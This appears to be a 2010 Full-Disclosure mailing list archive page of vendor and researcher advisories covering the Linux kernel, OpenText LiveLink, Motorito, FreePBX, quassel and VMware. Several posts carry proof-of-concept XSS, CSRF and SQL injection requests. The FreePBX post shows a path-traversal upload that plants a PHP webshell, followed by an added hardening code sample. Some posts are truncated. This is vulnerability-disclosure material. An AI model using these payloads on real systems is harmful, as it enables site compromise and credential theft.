[Full-disclosure] [ MDVSA-2010:188 ] kernel

2010-09-23 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2010:188
 http://www.mandriva.com/security/
 ___

 Package : kernel
 Date: September 23, 2010
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 fs/namei.c in Linux kernel 2.6.18 through 2.6.34 does not always
 follow NFS automount symlinks, which allows attackers to have an
 unknown impact, related to LOOKUP_FOLLOW. (CVE-2010-1088)
 
 The tc_fill_tclass function in net/sched/sch_api.c in the tc subsystem
 in the Linux kernel 2.4.x before 2.4.37.6 and 2.6.x before 2.6.31-rc9
 does not initialize certain (1) tcm__pad1 and (2) tcm__pad2 structure
 members, which might allow local users to obtain sensitive information
 from kernel memory via unspecified vectors. (CVE-2009-3228)
 
 The do_pages_move function in mm/migrate.c in the Linux kernel before
 2.6.33-rc7 does not validate node values, which allows local users
 to read arbitrary kernel memory locations, cause a denial of service
 (OOPS), and possibly have unspecified other impact by specifying a
 node that is not part of the kernel node set. (CVE-2010-0415)
 
 The ATI Rage 128 (aka r128) driver in the Linux kernel before
 2.6.31-git11 does not properly verify Concurrent Command Engine (CCE)
 state initialization, which allows local users to cause a denial of
 service (NULL pointer dereference and system crash) or possibly gain
 privileges via unspecified ioctl calls. (CVE-2009-3620)
 
 The wake_futex_pi function in kernel/futex.c in the Linux kernel
 before 2.6.33-rc7 does not properly handle certain unlock operations
 for a Priority Inheritance (PI) futex, which allows local users to
 cause a denial of service (OOPS) and possibly have unspecified other
 impact via vectors involving modification of the futex value from
 user space. (CVE-2010-0622)
 
 The kvm_arch_vcpu_ioctl_set_sregs function in the KVM in Linux kernel
 2.6 before 2.6.30, when running on x86 systems, does not validate
 the page table root in a KVM_SET_SREGS call, which allows local
 users to cause a denial of service (crash or hang) via a crafted cr3
 value, which triggers a NULL pointer dereference in the gfn_to_rmap
 function. (CVE-2009-2287)
 
 The handle_dr function in arch/x86/kvm/vmx.c in the KVM subsystem
 in the Linux kernel before 2.6.31.1 does not properly verify the
 Current Privilege Level (CPL) before accessing a debug register,
 which allows guest OS users to cause a denial of service (trap)
 on the host OS via a crafted application. (CVE-2009-3722)
 
 The ext4_decode_error function in fs/ext4/super.c in the ext4
 filesystem in the Linux kernel before 2.6.32 allows user-assisted
 remote attackers to cause a denial of service (NULL pointer
 dereference), and possibly have unspecified other impact, via a
 crafted read-only filesystem that lacks a journal. (CVE-2009-4308)
 
 The eisa_eeprom_read function in the parisc isa-eeprom component
 (drivers/parisc/eisa_eeprom.c) in the Linux kernel before 2.6.31-rc6
 allows local users to access restricted memory via a negative ppos
 argument, which bypasses a check that assumes that ppos is positive
 and causes an out-of-bounds read in the readb function. (CVE-2009-2846)
 
 Multiple buffer overflows in fs/nfsd/nfs4xdr.c in the
 XDR implementation in the NFS server in the Linux kernel before
 2.6.34-rc6 allow remote attackers to cause a denial of service (panic)
 or possibly execute arbitrary code via a crafted NFSv4 compound
 WRITE request, related to the read_buf and nfsd4_decode_compound
 functions. (CVE-2010-2521)
 
 mm/shmem.c in the Linux kernel before 2.6.28-rc8, when strict
 overcommit is enabled and CONFIG_SECURITY is disabled, does not
 properly handle the export of shmemfs objects by knfsd, which allows
 attackers to cause a denial of service (NULL pointer dereference and
 knfsd crash) or possibly have unspecified other impact via unknown
 vectors.  NOTE: this vulnerability exists because of an incomplete
 fix for CVE-2010-1643. (CVE-2008-7256)
 
 The release_one_tty function in drivers/char/tty_io.c in the
 Linux kernel before 2.6.34-rc4 omits certain required calls to the
 put_pid function, which has unspecified impact and local attack
 vectors. (CVE-2010-1162)
 
 mm/shmem.c in the Linux kernel before 2.6.28-rc3, when strict
 overcommit is enabled, does not properly handle the export of shmemfs
 objects by knfsd, which allows attackers to cause a denial of service
 (NULL pointer dereference and knfsd crash) or possibly have unspecified
 other impact via unknown vectors. (CVE-2010-1643)
 
 The sctp_process_unk_param function in net/sctp/sm_make_chunk.c
 in the Linux kernel 2.6.33.3 and earlier, when SCTP i

[Full-disclosure] OpenText LiveLink 9.7.1 multiple vulnerabilities (CSRF, XSS)

2010-09-23 Thread A. Ramos
# Exploit Title: OpenText LiveLink multiple vulnerabilities (CSRF, XSS)
# Date: 22/06/2010
# Author: Alejandro Ramos 
# http://www.securitybydefault.com
# Software Link: http://www.opentext.com/
# Version: 9.7.1
# Tested on: Solaris

Opentext (NASDAQ OTEX) LiveLink 9.7.1

Livelink features several advanced foundational elements that allow
organizations to rapidly and easily enable advanced content management
applications and solutions throughout the enterprise.

CSRF:
Livelink ECM is prone to a cross-site request forgery vulnerability
because it fails to properly sanitize data input.

An attacker may leverage this issue to change permissions of folders
or resources.

1.- POST Request:
https://host/func=ll&objAction=EditAcl2&objType=1&objID=514&nodeId=3083071&id=14&rightId=14&PermType=0&Root=&nextUrl2=&PermActionType=&See=on&SeeContent=on&Modify=on&EditAttr=on&Reserve=on&DeleteVersion=on&Delete=on&EditPerm=on

XSS:

Livelink ECM is prone to a cross-site scripting vulnerability because it fails
to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This may
help the attacker steal cookie-based authentication credentials and
launch other attacks.

1.- parameter: viewType
https://host/livelink/livelink?func=ll&objId=514&objAction=browse&viewType=aa";>alert(514)https://host/livelinkdav/nodes/OOB_DAVWindow.html?func=oobget&nodeid=514&support=/livelinksupport/&setctx=');alert('XSS');//514--idctx-12&ctxval=blahblah

5.- POST Request.-
https://host/livelink/livelink?func=ll.processAccept&objId=514&webDAVCacheID=1&cacheID=1&sysCacheID=0&nextUrl=/livelink/livelink%3Ffunc%3Dll%26objID%3D514%26objAction%3Dbrowse%26viewType%3D21

6.- parameter: sort
https://host/livelink/livelink?func=ll&objid=1&objAction=browse&sort=%22%3E%3Cscript%3Ealert%28514%29%3C/script%3E%3Cimg%20src=%22


-- 
Alejandro Ramos
http://www.securitybydefault.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ISecAuditors Security Advisories] SQL Injection and XSS in Motorito < v2.0 Ni 483

2010-09-23 Thread ISecAuditors Security Advisories
=
INTERNET SECURITY AUDITORS ALERT 2010-005
- Original release date: March 30th, 2010
- Last revised: September 23rd, 2010
- Discovered by: Mario Diaz Caldera
- Severity: 5.5/10 (CVSS Base Score)
=

I. VULNERABILITY
-
SQL Injection and XSS in Motorito < v2.0 Ni 483

II. BACKGROUND
-
Motorito is an on-line marketing tool. It is used to manage the
contents of Web Site, create new content, decide which news to put on
the cover, update product catalog, manage the areas of promotion,
manage users, edit the menu items, layout, send e-mails, etc.

III. DESCRIPTION
-
This bug was found using CentOS and the last release of Motorito with
Apache 2.2.3 and PHP 5.1.6.

To exploit the vulnerability it is only necessary to use version 1.0 of
the HTTP protocol to interact with the application; it is then possible
to check that the variables of the index.php module are not properly
filtered.

IV. PROOF OF CONCEPT
-
GET /?mmod=>"'>alert(4135)&file=>"'>alert(4135) HTTP/1.0
Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.testhostwithmotorito.es
Referer: http://www.testhostwithmotorito.es/

HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

Database error: Invalid SQL: SELECT parentID
FROM sis_menus WHERE module='>"'>alert(4135)' 
MySQL Error: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '>alert(4135)'' at line 1)
Session halted.

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks.  Client systems can also be
targeted, and complete compromise of these client systems is also
possible.

VI. SYSTEMS AFFECTED
-
Motorito < v2.0 Ni 483

VII. SOLUTION
-
Upgrade to the next version of Motorito. It can be obtained from
http://www.motorito.com
Current version at advisory publication: 2.0 - Ni 891.

VIII. REFERENCES
-
http://www.motorito.com
http://www.isecauditors.com

IX. CREDITS
-
This vulnerability has been discovered
by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com).

X. REVISION HISTORY
-
March 30, 2010: Initial release

XI. DISCLOSURE TIMELINE
-
February 22, 2010: Discovered by Internet Security Auditors.
June 14, 2010: Sent to the vendor.
  Response about revision and inclusion in
  Project Plan.
September 23, 2010: Request for update. Response about correction.
September 23, 2010: Sent to public lists.

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are a vendor-independent provider with deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.



[Full-disclosure] Teamspeak default passwords?

2010-09-23 Thread Gary Baribault
 Is there a problem with default password assignment with a piece of
software called TeamSpeak? I have script kiddies trying to access my
SSH server with logins 'ts', 'tss', 'ts1' and 'teamspeak'. This has
only started up in the last few days.

-- 
Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1



[Full-disclosure] TWSL2010-005: FreePBX recordings interface allows remote code execution

2010-09-23 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2010-005:
FreePBX recordings interface allows remote code execution

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-005.txt

Published: 2010-09-23
Version: 1.0

Vendor: FreePBX (http://www.freepbx.org/)
Product: FreePBX and VOIP solutions (AsteriskNOW, TrixBox, etc) using it
Version(s) affected: 2.8.0 and below

Product Description:
FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of
volunteers, has been downloaded over 5,000,000 times, and is utilized in an
estimated 500,000 active phone systems.

Source: http://www.freepbx.org
Credit: Wendel G. Henrique of Trustwave's SpiderLabs

CVE: CVE-2010-3490

Finding:
The configuration interface for FreePBX is prone to a remote arbitrary code
execution on the system recordings menu. FreePBX doesn't handle file uploads
in a secure manner, allowing an attacker to manipulate the file extension
and the beginning of the uploaded file name.

The piece of code below, found in page.recordings.php, illustrates part of
the recordings upload feature.

/* Code removed to fit better on advisory */

"._("Successfully uploaded")."
  ".$_FILES['ivrfile']['name']."";
$rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.');
  } ?>

/* Code removed to fit better on advisory */

When a file is uploaded, a copy is saved temporarily under the /tmp/
directory, where the name of the file is composed of
user-controlled-staticname.extension, where:

"user-controlled" is $usersnum variable.
"staticname" value is -ivrrecording.
"extension" is controlled by the user.

If $usersnum variable is not defined, then a static string (unnumbered)
is used.

Finally, when the user clicks on the save button on the System Recordings
interface, the file is saved with the original file name provided by the
user under the /var/lib/asterisk/sounds/custom/ directory.

When uploading a file, an attacker can manipulate the $usersnum variable to
perform a path traversal attack and save it anywhere the web server
user has access, for example Apache's DocumentRoot. This allows an
attacker to upload malicious code to the web server and execute it under the
web server's access permissions.

The HTTP request below illustrates the upload of a phpshell.

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---5991806838789183981588991120
Content-Length: 116089

-5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream



-5991806838789183981588991120--

To access the webshell in this example, an attacker would use
the following path: http://10.10.1.3/admin/SpiderLabs-ivrrecording.php

Maintainer Response:
The maintainer has released a patch to address this issue for all versions
of the software 2.3 and newer.

Details of the patch can be found here:
http://www.freepbx.org/trac/ticket/4553

Remediation Steps: 
Install the maintainer-provided patch.

Vendor Communication Timeline:
08/13/10 - Initial contact
08/18/10 - Vulnerability disclosed
09/16/10 - Initial fix proposed by maintainer
09/22/10 - Fix reviewed, improved, and released by maintainer
09/23/10 - Advisory public release

Revision History: 
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized ret
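As an added example (not FreePBX's own code), the following shows a hardened version of the temporary-filename construction the advisory describes. It keeps the same usersnum-ivrrecording.extension scheme under /tmp; the numeric-or-"unnumbered" rule for usersnum, the sound-format extension whitelist and the function name are assumptions made for this illustration.

```php
<?php
// Added example, not FreePBX code. Builds the temporary recording path
// described in the advisory while refusing any user-supplied piece that
// could move the file out of the upload directory.

const UPLOAD_DIR  = '/tmp';
// Assumption: only Asterisk sound formats are legitimate recordings.
const ALLOWED_EXT = ['wav', 'gsm', 'ulaw', 'alaw', 'sln'];

/**
 * Return "/tmp/<usersnum>-ivrrecording.<ext>" for acceptable input, or null
 * when usersnum or the client-supplied filename must not be trusted.
 */
function safe_recording_path(string $usersnum, string $clientName): ?string
{
    // usersnum is meant to be an extension number, or the literal
    // "unnumbered" the advisory mentions for the undefined case. Slashes,
    // dots and anything else are rejected outright, so "../" can never
    // reach the path.
    if (!preg_match('/^(unnumbered|[0-9]{1,10})$/', $usersnum)) {
        return null;
    }

    // The extension is taken from the uploaded filename, so whitelist it
    // rather than trusting whatever the client declared.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    $candidate = UPLOAD_DIR . '/' . $usersnum . '-ivrrecording.' . $ext;

    // Defence in depth: the directory the file would land in must resolve
    // to UPLOAD_DIR itself, independent of the checks above.
    $dirReal    = realpath(UPLOAD_DIR);
    $parentReal = realpath(dirname($candidate));
    if ($dirReal === false || $parentReal !== $dirReal) {
        return null;
    }
    return $candidate;
}

// Constructed inputs: the traversal value from the request above versus an
// ordinary upload from a numbered extension.
$rejected = safe_recording_path('../../../../../var/www/html/admin/SpiderLabs', 'webshell.php');
$accepted = safe_recording_path('1001', 'greeting.wav');

echo ($rejected === null ? 'traversal value rejected' : "BUG: accepted $rejected") . PHP_EOL;
echo ($accepted ?? 'BUG: valid upload rejected') . PHP_EOL;
```

The same basename-and-whitelist treatment belongs on the final save into /var/lib/asterisk/sounds/custom/, since the advisory notes that step reuses the original client-supplied filename.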

[Full-disclosure] [USN-991-1] quassel vulnerability

2010-09-23 Thread Steve Beattie
===
Ubuntu Security Notice USN-991-1 September 23, 2010
quassel vulnerability
https://launchpad.net/bugs/629774
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  quassel       0.4.1-0ubuntu3.1
  quassel-core  0.4.1-0ubuntu3.1

Ubuntu 9.10:
  quassel       0.5.0-0ubuntu1.2
  quassel-core  0.5.0-0ubuntu1.2

Ubuntu 10.04 LTS:
  quassel       0.6.1-0ubuntu1.1
  quassel-core  0.6.1-0ubuntu1.1

After a standard system update you need to restart quassel or
quasselcore to make all the necessary changes.

Details follow:

Jima discovered that quassel would respond to a single privmsg
containing multiple CTCP requests with multiple NOTICEs, possibly
resulting in a denial of service against the IRC connection.



[Full-disclosure] VMSA-2010-0014 VMware Workstation, Player, and ACE address several security issues

2010-09-23 Thread VMware Security team

- 
   VMware Security Advisory

Advisory ID:   VMSA-2010-0014
Synopsis:  VMware Workstation, Player, and ACE address several
   security issues.
Issue date:2010-09-23
Updated on:2010-09-23 (initial release of advisory)
CVE numbers:   CVE-2010-3277 CVE-2010-1205 CVE-2010-0205
   CVE-2010-2249 CVE-2010-0434 CVE-2010-0425
- 

1. Summary

   VMware Workstation and Player address a potential installer security
   issue and security issues in libpng. VMware ACE Management Server
   (AMS) for Windows updates Apache httpd.

2. Relevant releases

   VMware Workstation 7.1.1 and earlier,
   VMware Player 3.1.1 and earlier,
   VMware ACE Management Server 2.7.1 and earlier,

   Note: VMware Server was declared End Of Availability in January 2010;
 support will be limited to Technical Guidance for the duration
 of the support term.

3. Problem Description

 a. VMware Workstation and Player installer security issue

The Workstation 7.x and Player 3.x installers will load an index.htm
file located in the current working directory on which Workstation
7.x or Player 3.x is being installed. This may allow an attacker to
display a malicious file if they manage to get their file onto the
system prior to installation.

The issue can only be exploited at the time that Workstation 7.x or
Player 3.x is being installed. Installed versions of Workstation and
Player are not affected. The security issue is no longer present in
the installer of the new versions of Workstation 7.x and Player 3.x
(see table below for the version numbers).

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-3277 to this issue.

VMware would like to thank Alexander Trofimov and Marc Esher for
independently reporting this issue to VMware.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running   Replace with/
Product        Version   on        Apply Patch
=============  ========  ========  =============================
VirtualCenter  any       Windows   not affected

Workstation    7.x       any       7.1.2 build 301548 or later *
Workstation    6.5.x     any       not affected

Player         3.x       any       3.1.2 build 301548 or later *
Player         2.5.x     any       not affected

AMS            any       any       not affected

Server         any       any       not affected

Fusion         any       Mac OS/X  not affected

ESXi           any       ESXi      not affected

ESX            any       ESX       not affected

 * Note: This only affects the installer; if you have a version of
 Workstation or Player installed you are not vulnerable.


 b. Third party libpng updated to version 1.2.44

A buffer overflow condition in libpng is addressed that could
potentially lead to code execution with the privileges of the
application using libpng. Two potential denial of service issues
are also addressed in the update.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249
to these issues.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.


VMware         Product   Running   Replace with/
Product        Version   on        Apply Patch
=============  ========  ========  =============================
VirtualCenter  any       Windows   not affected

Workstation    7.1.x     any       7.1.2 build 301548 or later
Workstation    6.5.x     any       affected, patch pending

Player         3.1.x     any       3.1.2 build 301548 or later
Player         2.5.x     any       affected, patch pending

AMS            any       any       not affected

Server         any       any       affected, no patch planned

Fusion         any       Mac OS/X  not affected

ESXi           any       ESXi      not affected

ESX            any       ESX       not affected


 c. VMware ACE Management Server (AMS) for Windows updates Apache httpd
version 2.2.15.

A function in Apache HTTP Server when multithreaded MPM is used
does not properly handle headers in subrequests in certain
circumstances which may allow remote attackers to obtain sensitive
information via a crafted request that triggers access to memory
locations associated with an earlier request.

The Apache mod_isapi module can be forced to unload a specific
library before the processing of a request is complete, resulting
in memory corruption. This vulnerability may allow a remote
a